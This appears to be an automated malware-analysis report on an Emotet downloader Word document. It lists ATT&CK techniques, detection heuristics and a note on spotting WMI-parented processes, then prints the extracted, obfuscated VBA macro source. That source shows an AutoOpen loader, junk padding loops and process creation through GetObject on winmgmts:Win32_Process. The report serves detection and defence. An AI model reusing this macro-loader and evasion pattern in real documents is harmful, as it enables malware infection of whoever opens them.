Verdict: MALICIOUS
Risk Score: 282
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample is a malicious Word (OLE) document whose VBA project carries an autoopen entry point (written as "Sub _" followed by "autoopen()" via a line continuation) padded with dead "While x And y ... Wend" loops of Close calls. The loop conditions test undeclared (Empty) variables, so they are always False and the bodies never run; they exist only to bulk up the module and dilute token-based signatures. The live path calls i3180459, which concatenates a string from UserForm control properties (.Tag, .Value, .ControlTipText) and then calls GetObject on the split-literal moniker "winmgmts:Win32_Process", i.e. process creation through WMI. The command line itself lives in the form controls, not in the recovered module source, so the download URL is not visible in the macro text alone. ClamAV labels the file Doc.Downloader.Emotet-6969153-0, consistent with an Emotet first-stage maldoc whose job is to fetch and run a second-stage payload. Detection note: a process started through Win32_Process.Create is parented by WmiPrvSE.exe rather than WINWORD.EXE, so parent/child rules keyed only on the Office binary miss this chain.
Heuristics (8)

- ClamAV: Doc.Downloader.Emotet-6969153-0 (critical) CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Emotet-6969153-0
- VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- Obfuscated auto-exec VBA loader (critical) OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro (high) OLE_VBA_AUTOOPEN: AutoOpen macro
- GetObject call (high) OLE_VBA_GETOBJ: GetObject call
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace identifier, not a download location.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7600 bytes |

SHA-256 (macros.bas): 548b774705a3485ba39b23e8b181e4f6339f72ed941c819604f778cb8538cbdf
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "s809414"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "H47791"
Attribute VB_Base = "0{84BA4EDA-3030-441D-9B9F-85CC551D54D4}{21E9DCB8-B7C2-428C-AEF0-5618FBBCC61D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "t546__"
Attribute VB_Name = "H0491271"
Attribute VB_Name = "j312667"
Attribute VB_Base = "0{5E3DD7C8-252B-4672-BBD8-C0ED11D7007D}{ACF3260D-7AE1-4F24-A360-A68A0916F1E9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "I0366176"
Function k_6499(M0075388)
While t71215 And n30826
Close ("d83039")
Close ("i61336")
Close ("719628733")
Close ("445853956")
Wend
While J3491272 And W12506_
Close ("V4652784")
Close ("t3__9076")
Close ("869063569")
Close ("504508744")
Wend
While p77_316 And b1454784
Close ("S_7071")
Close ("r_4613")
Close ("550767436")
Close ("813533166")
Wend
Set k_6499 = CVar(M0075388)
While W_65181 And G56518
Close ("P374487")
Close ("u_340099")
Close ("990644500")
Close ("600345385")
Wend
While M_5_584 And s347000
Close ("z51542_5")
Close ("D88900")
Close ("424495686")
Close ("811232344")
Wend
End Function
Sub _
autoopen()
On Error Resume Next
While s573228 And Z600446
Close ("F_62880")
Close ("s08677")
Close ("975322690")
Close ("869452482")
Wend
While d8922689 And v953_5
Close ("o5750_")
Close ("K204904")
Close ("593153193")
Close ("982901103")
Wend
While h044543_ And F_335826
Close ("Y995276")
Close ("m91764")
Close ("934648098")
Close ("801472931")
Wend
Call i3180459
While u037229 And P7798912
Close ("F_46411")
Close ("q16614")
Close ("681455954")
Close ("116930874")
Wend
While f019566 And z01488
Close ("A0264__")
Close ("G345963")
Close ("308306476")
Close ("441684264")
Wend
While E496_2_ And E690575_
Close ("j038385")
Close ("w947415")
Close ("206867240")
Close ("732265525")
Wend
End Sub
Attribute VB_Name = "N41364_"
Function i3180459()
On Error Resume Next
While w610585 And X515660
Close ("l5780_57")
Close ("A87488")
Close ("671928644")
Close ("67070097")
Wend
While W493_43 And Z1_565
Close ("f9955008")
Close ("F20485")
Close ("953526756")
Close ("945698588")
Wend
B467960 = H47791.B235287.Tag + j312667.J_745482 + H47791.B235287 + j312667.Q78810 + H47791.B235287.Value + H47791.B235287 + j312667.z926_7 + H47791.B235287 + H47791.B235287.Tag + j312667.c5253727 + H47791.B235287 + j312667.d1_26907.ControlTipText + H47791.B235287
While q6800584 And R8459099
Close ("h_09_90")
Close ("S205855")
Close ("249600478")
Close ("956636474")
Wend
While W636305_ And d1360_
Close ("D3906_")
Close ("U_28868")
Close ("510091760")
Close ("55526268")
Wend
Set L01__7 = k_6499(GetObject(CStr("wi") + CStr("nmgmt") + "s:Win32_Proce" + "ss"))
... (truncated)